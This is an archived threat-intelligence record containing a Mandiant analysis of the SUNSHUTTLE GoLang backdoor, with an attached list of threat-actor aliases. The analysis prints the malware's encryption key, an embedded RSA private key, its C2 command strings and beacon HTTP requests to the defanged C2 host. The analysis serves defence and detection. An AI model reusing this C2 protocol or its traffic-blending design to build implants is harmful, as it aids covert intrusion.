{ "id": "f45e86a6-f77a-4d56-9432-4a22e7162e3c", "created_at": "2026-04-06T00:21:35.524313Z", "updated_at": "2026-04-10T03:37:32.543678Z", "deleted_at": null, "sha1_hash": "604ea5a293a9928c540dc64e412b79f90eb88bff", "title": "New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452 | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 616981, "plain_text": "New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting\r\nU.S.-Based Entity; Possible Connection to UNC2452 | Mandiant\r\nBy Mandiant\r\nPublished: 2021-03-04 · Archived: 2026-04-02 11:02:49 UTC\r\nWritten by: Lindsay Smith, Jonathan Leathery, Ben Read\r\nExecutive Summary\r\nIn August 2020, a U.S.-based entity uploaded a new backdoor that we have named SUNSHUTTLE to a\r\npublic malware repository.\r\nSUNSHUTTLE is a second-stage backdoor written in GoLang that features some detection evasion\r\ncapabilities.\r\nMandiant observed SUNSHUTTLE at a victim compromised by UNC2452, and have indications that it is\r\nlinked to UNC2452, but we have not fully verified this connection.\r\nPlease see the Technical Annex for relevant MITRE ATT\u0026CK techniques (T1027, T1027.002, T1059.003,\r\nT1071.001, T1105, T1140, T1573.001).\r\nThe activity discussed in this blog post is also detailed in a Microsoft blog post. We thank the team at Microsoft\r\nand other partners for their great collaboration in tracking this actor.\r\nThreat Detail\r\nMandiant Threat Intelligence discovered a new backdoor uploaded by a U.S.-based entity to a public malware\r\nrepository in August 2020 that we have named SUNSHUTTLE. SUNSHUTTLE is written in GO, and reads an\r\nembedded or local configuration file, communicates with a hard-coded command and control (C2) server over\r\nHTTPS, and supports commands including remotely uploading its configuration, file upload and download, and\r\narbitrary command execution. Notably, SUNSHUTTLE uses cookie headers to pass values to the C2, and if\r\nconfigured, can select referrers from a list of popular website URLs to help such network traffic “blend in.”\r\nThe SUNSHUTTLE backdoor file examined, “Lexicon.exe” (MD5: 9466c865f7498a35e4e1a8f48ef1dffd),\r\nwas written in GoLang. The file unpacks into MD5: 86e89349fefcbdd9d2c80ca30fa85511.\r\nThe infection vector for SUNSHUTTLE is not known. It is most likely a second-stage backdoor dropped\r\nafter an initial compromise.\r\nThe SUNSHUTTLE sample uses the actor-controlled server “reyweb[.]com” for C2. “Reyweb[.]com” is\r\nregistered anonymously via NameSilo, a domain provider who accepts bitcoin payment and has been used\r\nfor C2 registration by state-sponsored APTs in the past, including Russia-nexus actors and Iran-nexus APTs\r\nMandiant observed SUNSHUTTLE at a victim compromised by UNC2452, and have indications that it is linked\r\nto UNC2452, but we have not fully verified this connection.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 1 of 12\n\nPlease see FireEye’s resource center for background on UNC2452 and the SUNBURST campaign.\r\nOutlook and Implications\r\nThe new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but\r\nelegant detection evasion techniques via its “blend-in” traffic capabilities for C2 communications. SUNSHUTTLE\r\nwould function as second-stage backdoor in such a compromise for conducting network reconnaissance alongside\r\nother SUNBURST-related tools.\r\nTechnical Annex\r\nMandiant Threat Intelligence discovered a sample of the SUNSHUTTLE backdoor uploaded to an online multi-Antivirus scan service. SUNSHUTTLE is a backdoor, written in GO, that reads an embedded or local\r\nconfiguration file, communicates with its C2 server over HTTPS and supports commands including remotely\r\nupdating its configuration, file upload and download, and arbitrary command execution.\r\nLexicon.exe (MD5: 9466c865f7498a35e4e1a8f48ef1dffd)\r\nC2: reyweb[.]com\r\nUNAVAILABLE (MD5: 86e89349fefcbdd9d2c80ca30fa85511)\r\nUnpacked version of 9466c865f7498a35e4e1a8f48ef1dffd\r\nInfection Vector\r\nFor the samples analyzed, the infection vector is not known.\r\nExecution\r\nExecution Summary\r\nSUNSHUTTLE is a backdoor written in GoLang. Once SUNSHUTTLE is executed, a high-level description of\r\nthe execution is the following:\r\nConfiguration settings determined\r\nRequest a “session key” from the C2\r\nRetrieve the “session key” from the C2\r\nOnce a session key is retrieved, SUNSHUTTLE begins command request beaconing loop\r\nBegin command request beaconing\r\nResolve command and perform action\r\nThe SUNSHUTTLE sample analyzed retains the names of the routines used by the malware, which include the\r\nfollowing:\r\nmain.request_session_key\r\nmain.define_internal_settings\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 2 of 12\n\nmain.send_file_part\r\nmain.clean_file\r\nmain.send_command_result\r\nmain.retrieve_session_key\r\nmain.save_internal_settings\r\nmain.resolve_command\r\nmain.write_file\r\nmain.beaconing\r\nmain.wget_file\r\nmain.fileExists\r\nmain.encrypt\r\nmain.decrypt\r\nmain.random\r\nmain.removeBase64Padding\r\nmain.addBase64Padding\r\nmain.delete_empty\r\nmain.Unpad\r\nmain.GetMD5Hash\r\nmain.Pad\r\nNote: Throughout the SUNSHUTTLE backdoor, unique string identifiers are used to indicate the operation being\r\nperformed to the C2 via a Cookie header, and unique string identifiers are also used to validate and parse response\r\ncontent from the C2. These unique string values are thought to be unique and random per compiled sample.\r\nInitial Execution\r\nOnce executed, the SUNSHUTTLE backdoor enumerates the victim’s MAC address and compares it to a\r\nhardcoded MAC address value “c8:27:cc:c2:37:5a”. If a match is found the backdoor exits. The MAC address is\r\nlikely a default MAC address for the Windows sandbox network adapter.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 3 of 12\n\nFigure 1: Mac address check\r\nConfiguration\r\nIf the check is successful, the SUNSHUTTLE backdoor then enters a routine named\r\n“main_define_internal_settings”, which handles creation of the configuration file if one doesn’t already exist in\r\nthe directory from which SUNSHUTTLE is running. For the sample analyzed, the configuration filename is\r\n“config.dat.tmp”. The configuration data is Base64 encoded and AES-256 encrypted using the following key:\r\nhz8l2fnpvp71ujfy8rht6b0smouvp9k8\r\nThe configuration has the following example values when Base64 decoded and AES decrypted:\r\n48b9e25491e088a35105274cae0b9e67|5-\r\n15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2V\r\nja28vMjAxMDAxMDEgRmlyZWZveC83NS4w\r\nThe configuration holds several values delimited by a “|” character, which are briefly described as follows.\r\n48b9e25491e088a35105274cae0b9e67\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 4 of 12\n\nMD5 hash of the current timestamp calculated during execution.\r\n5-15\r\nLower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes\r\n0\r\n0 or 1 — Utilize “blend-in” traffic requests. Internally called “false_requesting”\r\n0\r\nActivate execution timestamp (0 by default) — execution \"activates\" or continues if current time is\r\ngreater than the value in the configuration\r\nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja2\r\n8vMjAxMDAxMDEgRmlyZWZveC83NS4w\r\nBase64-encoded User-agent used in HTTPS requests\r\nDecoded: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nIf set in the configuration, the “blend-in” traffic occurs as the malware executes and transitions through its\r\nroutines. The following URLs are leveraged for the “blend-in” requests:\r\nhttps://reyweb[.]com/icon.ico\r\nhttps://reyweb[.]com/icon.png\r\nhttps://reyweb[.]com/script.js\r\nhttps://reyweb[.]com/style.css\r\nhttps://reyweb[.]com/css/style.css\r\nhttps://reyweb[.]com/css/bootstrap.css\r\nhttps://reyweb[.]com/scripts/jquery.js\r\nhttps://reyweb[.]com/scripts/bootstrap.js\r\nhttps://cdn.mxpnl[.]com/\r\nhttps://cdn.google[.]com/\r\nhttps://cdn.jquery[.]com/\r\nhttps://code.jquery[.]com/\r\nhttps://cdn.cloudflare[.]com/\r\nSession Key Mechanism\r\nSUNSHUTTLE performs initial requests to the C2 in order to request and then retrieve what it internally refers to\r\nas a session key. The retrieved session key from the C2 appears to be RSA decrypted using the following private\r\nkey that is embedded in SUNSHUTTLE and believed to be unique per compiled sample. Analysis is on-going on\r\nhow the decrypted session key is used, but it is likely a session key used to encrypt content once SUNSHUTTLE\r\ntransitions to its command-and-control routines.\r\n-----BEGIN PRIVATE KEY-----\r\nMIIEowIBAAKCAQEA0Aj/3K3m/rKNESwUfHC9qAhnsNYA9bJ4HQ30DPsfPDvbbHZm\r\nUj5nyp2abjYZYMQbWa2+ZO4Ixgfdm0FzsAH/haKIN4sSkbw+YRESYW35MnMI3Adf\r\nmj/eK/yKNblyoe/7iWP3nz+y4Q/QI0L6BrF7VodTaDYtDup3iI+B5zjmhElf9Fmg\r\nS1JiDUgydz5VXJR/esv6hB7GMfEb/3sIAzv5qcwEvGK5HH1EzQ7zjauyhbsF9pHR\r\nzCFYlvW4OtaU0o3xjVufo5UwYRS5p/EFpof45zuJGLJ02cKUmxc0OX53t3Bn9WXY\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 5 of 12\n\naDDhYp/RPzywG8N9gTBv8rKxRIsFxxKu+8wK+QIDAQABAoIBAGe4hPDe13OXTBQK\r\nuTAN+dEkV6ZoHFRjpdU+lrY+IiWi5lSed4d7y73OdCeM23xOaiB9KpchwsgRNeDp\r\ncieH54EWNvoSYbC9fRBiNZrT/NG1Xu5s0rKSM1AU+kes7UVl5DBs4hHI7YOeobRi\r\n+UuLA6ZxlBk6IZ71MaGpgyfoS64aDMvZDtcaTEGzw6dRQAU9255DTIc2YYbq8MqL\r\nzSafD5eBDH3Izmblg0kXiidec1A1sytz5u8xW4XckHfp4xePLVw/RvLJGqNJMK5M\r\n7tXAFwPzg+u4k7ce7uNw9VWW7n28T9xznUux1gtPQj1N6goDaBaOqY+h0ia9F1RP\r\nwu6ZtG0CgYEA8vCFmAGmMz4vjO04ELyPnvnaS6CReYCVzmvNugIDlxBLDGCnKBVx\r\net7qEk3gMkbtcDUOZpXQAIVCWQNupAhI0t5bb/Pfw3HtH3Xt5NRUYmwxTgNRe06D\r\ni4ICsg2+8TDinjne9hzsEe9DYE2WRrtLMJ+IPD+QE94J3Sei03k1wpMCgYEA2zga\r\nTff6jQeNn9G0ipHa1DvJmi98px51o0r7TUfZRxJfgg4ckyMsZUHKALrZszKAnxP7\r\nMXYrJuOHpsp0EZc1e3uTjFzrKyKRTQ78c7MNGv07w1PlZuNLtkoqepUjkQzdxKZO\r\ng9gG0O4lC5jjnSg8jUSChhZn+jrU8Vx7ByOP98MCgYAWi5+6RZzo8IJ1L6aeVwF1\r\nHXbWweX+QqKkb3i+JGW05Twxv96DZ8oKPxm17Sg7Qj3Sxfm6J3kQM02++QSRkHtB\r\npoUR1K4Vc0MwQj97lwDlyWih9sjfCqBGmCAr6f6oX4MIcBJzAKgf2faEv26MzeDi\r\neEuqW7PBRD/iGEWSHpOQpQKBgQDRgV+aTjk0mRhfugHKQLSbCnyUj3eZG8IfiiR7\r\nagQcKVH/sE7cy8u9Bc/xPKGb4dMMtQLm9WEuLFtTKr8cpJ8nYSXVCmRx9/pXY9Af\r\nHuqSdZutBDwERYvxLhZEys2P7XTwYGQ/GrEA8eeTms1FP9QGyofXcAh1G86w0Mp/\r\nOxx3EwKBgHXxgQa4/ngTlMNhWP+IvHOlOVAxDK2GL3XQdr8fudZe9c1d7VzIbYj6\r\ngbwLT9qi0wG5FAWqH163XucAirT6WCtAJ3tK0lfbS7oWJ7L/Vh1+vOe6jfS/nQna\r\nAo2QPbN8RiltHeaAq0ZfrgwrQuP5fmigmBa5lOWID/eU2OLlvJGi\r\n-----END PRIVATE KEY---\r\nAfter the configuration is created or read from, SUNSHUTTLE enters a routine named\r\n“main_request_session_key”. The malware will iterate over this routine until it’s successful, sleeping a period of\r\ntime after each iteration.\r\nInside the “main_request_session_key” routine, SUNSHUTTLE constructs an HTTPS request to its configured\r\nC2. Upon an HTTP 200 response from the request, the response data from the C2 is expected to not contain the\r\nfollowing string for the sample analyzed:\r\nywQdjLuHHC\r\nThe request_session_key routine returns a 1 if the string is not in the response and a -1 if it is in the response. If\r\nthe result of the request_session_key is 1, SUNSHUTTLE will execute the retrieve_session_key routine.\r\nThe retrieve_session_key routine again contacts the C2 and downloads content that is expected to be decrypted by\r\nthe aforementioned embedded private key. The decrypted content is likely a session key used to encrypt content\r\nonce SUNSHUTTLE transitions to its command-and-control routines.\r\nCommanding\r\nOnce a session key is retrieved from the C2, SUNSHUTTLE begins the beaconing and “resolve_command”\r\nroutines in a loop. SUNSHUTTLE first issues a beacon to retrieve a command. After, SUNSHUTTLE will enter\r\nthe routine “resolve_command”, which parses the response content to determine which command should be run.\r\nAvailable commands include remotely updating its configuration, file upload and download, and arbitrary\r\ncommand execution.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 6 of 12\n\nFigure 2: Resolve command graph\r\nThe content returned from the C2 after the “main_beaconing” routine is Base64 decoded and AES decrypted. A\r\ncheck is performed to ensure the decrypted content doesn’t contain the following string:\r\nCp5RTQ31R1\r\nAs noted, it is likely these strings are unique per sample and randomly generated at compilation.\r\nThe decrypted content is parsed for certain unique strings.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 7 of 12\n\nUnique string in decrypted response Meaning\r\nzSsP2TSJJm3a Update sleep range — save config\r\naQJmWJzXdYK721mGBI3U Update “false requesting” value – save config\r\nW5VYP9Iu2uyHK Update C2 URL and User-agent – save config\r\n3487wD9t2OZkvqdwRpqPeE Send current timestamp to C2\r\nubFxROBRwfswVRWNjLC Update \"activation\" timestamp in the config — save config\r\nTMuhGdA9EHY Upload file to C2 if the file exists\r\n1kG4NaRX83BCMgLo38Bjq Execute command – return “EXECED” if successful\r\nhB0upT6CUmdRaR2KVBvxrJ Execute command – return results/output\r\nN/A (other string criteria met) Provides terminal command execution\r\nN/A (other string criteria met) Download file from C2\r\nFiles Dropped\r\nAfter successful execution of the malware, it drops the following files to the victim’s system:\r\n\\config.dat.tmp (MD5: Dynamic)\r\nEncrypted configuration file\r\nPersistence Method\r\nThe SUNSHUTTLE malware was not observed setting its own persistence. It is likely the persistence is set\r\noutside of the execution of SUNSHUTTLE.\r\nNetwork Communications\r\nSUNSHUTTLE uses the cookie header to pass values to the C2. Additionally, a referrer is selected from the\r\nfollowing list, presumably to make the traffic blend in if traffic is being decrypted for inspection:\r\nwww.bing.com\r\nwww.yahoo.com\r\nwww.google.com\r\nwww.facebook.com\r\nThe cookie headers vary slightly depending on the operation being performed. The following is an example\r\nrequest to the C2 from the “request_session_key” routine.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 8 of 12\n\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nWithin the Cookie header, these values represent the following:\r\nHjELmFxKJc=48b9e25491e088a35105274cae0b9e67\r\nTimestamp MD5 contained within the configuration\r\nP5hCrabkKf=gZLXIeKI\r\n“P5hCrabkKf=” contains a unique string based on which routine is performing the request (see the\r\nfollowing table).\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx\r\n“i4zICToyI70Yeidf1f7rWjm5foKX2Usx” is hard coded within the SUNSHUTTLE backdoor. It\r\npossibly represents a payload identifier\r\nb7XCoFSvs1YRW=78\r\nUnknown purpose. This value is only included in request_session_key and retrieve_session_key\r\nrequests.\r\nAs mentioned, the cookie value “P5hCrabkKf=” contained in each request signifies the operation that is being\r\nperformed.\r\n“P5hCrabkKf=” Cookie Value Meaning\r\ngZLXIeK main_request_session_key\r\ndo1KiqzhQ main_clean_file\r\nt5UITQ2PdFg5 main_wget_file\r\ncIHiqD5p4da6OeB main_retrieve_session_key\r\nxpjQVt3bJzWuv main_send_file_part\r\nS4rgG1WifHU main_send_command_result\r\nAfter successful installation / initialization of the malware, it proceeds to make the following callback to the C2\r\nserver reyweb[.]com via TCP/443 HTTPS:\r\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 9 of 12\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.yahoo.com\r\nAccept-Encoding: gzip\r\nAdditionally, if the “fake_requesting” configuration value is set to 1, SUNSHUTTLE will generate traffic meant\r\nto blend in with real traffic. Examples of those requests are as follows:\r\nVictim to C2\r\nGET /icon.png HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.google.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /css/style.css HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /css/bootstrap.css HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to Legitimate\r\nGET / HTTP/1.1\r\nHost: cdn.cloudflare[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 10 of 12\n\nReferer: www.google.com\r\nAccept-Encoding: gzip\r\nAppendix: MITRE ATT\u0026CK Framework\r\nTechnique Description\r\nT1027 Obfuscated Files or Information\r\nT1027.002 Software Packing\r\nT1059.003 Windows Command Shell\r\nT1071.001 Web Protocols\r\nT1105 Ingress Tool Transfer\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1573.001 Symmetric Cryptography\r\nAppendix: Detecting the Techniques\r\nFireEye security solutions provide detection of the SUNSHUTTLE activity across email, endpoint and network\r\nlevels. The following is a snapshot of existing detections related to activity outlined in this blog post.\r\nPlatform(s) Detection Name\r\nNetwork Security\r\nEmail Security\r\nDetection On Demand\r\nMalware File Scanning\r\nMalware File Storage Scanning\r\nFE_APT_Backdoor_Win64_SUNSHUTTLE_1\r\nFE_APT_Backdoor_Win_SUNSHUTTLE_1\r\nAPT.Backdoor.Win.SUNSHUTTLE\r\nAPT.Backdoor.Win.SUNSHUTTLE.MVX\r\nEndpoint Security\r\nMalware Protection (AV/MG)\r\nTrojan.GenericKD.34453763\r\nGeneric.mg.9466c865f7498a35\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 11 of 12\n\nSource: https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html" ], "report_names": [ "sunshuttle-second-stage-backdoor-targeting-us-based-entity.html" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434895, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.pdf", "text": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.txt", "img": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.jpg" } }